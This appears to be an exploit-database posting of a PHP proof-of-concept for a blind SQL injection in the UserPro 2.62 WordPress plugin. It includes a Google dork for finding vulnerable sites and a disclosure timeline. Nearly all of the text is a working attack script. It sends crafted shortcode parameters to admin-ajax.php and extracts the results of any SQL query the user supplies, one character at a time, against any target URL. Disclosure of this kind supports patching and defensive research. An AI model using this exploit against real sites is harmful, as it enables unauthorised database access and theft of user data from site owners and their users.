WordPress UserPro 2.62 User Profiles with Social Login Exploit
Posted on 30 November -0001
<?php /** * Exploit Title: UserPro - User Profiles with Social Login Exploit * Google Dork: inurl:"wp-content/uploads/userpro/" * Exploit Author: <contact@wp0day.com> * Vendor Homepage: http://userproplugin.com/ * Software Link: http://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681 * Version: 2.62 * Tested on: Debian 8, PHP 5.5.9 * Type: SQLInjection * Time Line: Found [30-MAR-2016], Vendor notified [30-MAR-2016], Vendor fixed: [???], [RD:1] */ require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); $curl = new CurlWrapper(); $options = getopt("t:s:",array('tor:')); print_r($options); $options = validateInput($options); if (!$options){ help(); } exploit(); function isTrue($query){ global $curl, $options; $rand = rand(); $data = "action=userpro_shortcode_template&shortcode=[userpro template='memberlist' sortby="use_ssl' AND ($query) -- LIMIT 10 AND 11='777" ]"; $curl->post( $options['t'].'/wp-admin/admin-ajax.php?searchuser=yes&from_wp_user_level=0&to_wp_user_level=99', $data ); $res=$curl->getResponse(); //echo $res; $res = json_decode($res, true); if (preg_match('~No users match your search~', $res['response'])){ return false; } if (preg_match('~userpro-search-results">Found <span>(d+)</span> Members~', $res['response'])){ return true; } return '???'; } function exploit(){ global $curl, $options; echo "Blind SQL Injection "; $sql = (isset($options['s'])) ? $options['s'] : 'SELCET user() '; if (isset($options['s'])){ $sql = $options['s']; } echo "SQL: $sql "; $sql = "($sql)"; //First Step get the length. //Fuck divide et impera, its a POC, lets do the easy way. $len = 0; echo "Getting query Lenght."; for ($i=0; $i<50;$i++){ $query = "( (SELECT LENGTH($sql)) = $i )"; $status = isTrue($query); echo "."; if (!is_bool($status)){ die(" Got unexpected response from isTrue(). Aborting. "); } if ($status){ echo " Current Query lenght is $i "; $len = $i; break; } } if ($len > 0){ echo " Response: "; $charset = 'etaoinsrhdluc@1234567890.$mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ'; for ($i = 1; $i<$len+1; $i++){ $got = false; for ($j=0;$j<strlen($charset);$j++){ $query = "(SELECT MID(($sql),$i,1)) = '{$charset[$j]}' "; if (isTrue($query)){ echo $charset[$j]; $got = true; break; } } if (!$got){ echo "?"; } } } else { die(" Could not get Lenght of Query or is bigger than 50 "); } echo " Done."; } function validateInput($options){ if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ return false; } if (!preg_match('~/$~',$options['t'])){ $options['t'] = $options['t'].'/'; } return $options; } function help(){ global $argv; $help = <<<EOD UserPro - User Profiles with Social Login Exploit Usage: php $argv[0] -t [TARGET URL] -s [SQL] [TARGET_URL] http://localhost/wordpress/ Examples: php $argv[0] -t http://localhost/wordpress -s 'SELECT user()' Misc: CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru> @link http://github.com/svyatov/CurlWrapper @license http://www.opensource.org/licenses/mit-license.html MIT License EOD; echo $help." "; die(); } ?>
